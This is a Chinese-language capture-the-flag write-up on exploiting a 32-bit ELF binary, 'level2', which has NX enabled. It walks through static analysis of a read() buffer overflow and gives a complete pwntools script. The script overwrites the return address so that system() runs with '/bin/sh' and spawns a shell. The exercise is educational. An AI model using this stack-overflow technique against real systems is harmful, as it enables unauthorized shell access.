一、查看属性

首先还是必要的查看属性环节：

可以知道该文件是一个x86架构下的32位小段ELF程序，开启了栈不可执行（NX）保护，ret2shellcode是不行的

简单执行可以看到有一个简单的输入后输出hello world

二、静态分析

主函数中必然调用了一个vulnerable_function()函数，之后是调用system函数输出hello world，主函数没有可以利用的点

我们进入vulnerable_function()中查看，发现了一个read函数

但是该题目没有发现可以利用的函数，类似system（“/bin/sh”）或者system（“cat flag.txt”）等函数，所以我们需要使用32位程序利用栈传递参数的性质，将“/bin/sh”放到栈中，32位程序中的函数在调用时，会在父函数中先将该函数的参数从右向左一次压入栈中，之后压入父函数的ebp，之后压入返回地址（我们要覆盖的函数地址），之后就call到了子函数中开始执行

我们现在程序中找有没有“/bin/sh”这个字符串

之后就可以构造payload了，程序如下：

from pwn import*

io = process('./level2')
#io = gdb.debug('./level2','break *804844b')

elf = ELF('./level2')

binsh_addr = 0x804a024
system_addr = 0x8048320

payload='a'*(0x88+4)+p32(system_addr)+'bbbb'+p32(binsh_addr)

io.sendline(payload)
io.interactive()

执行：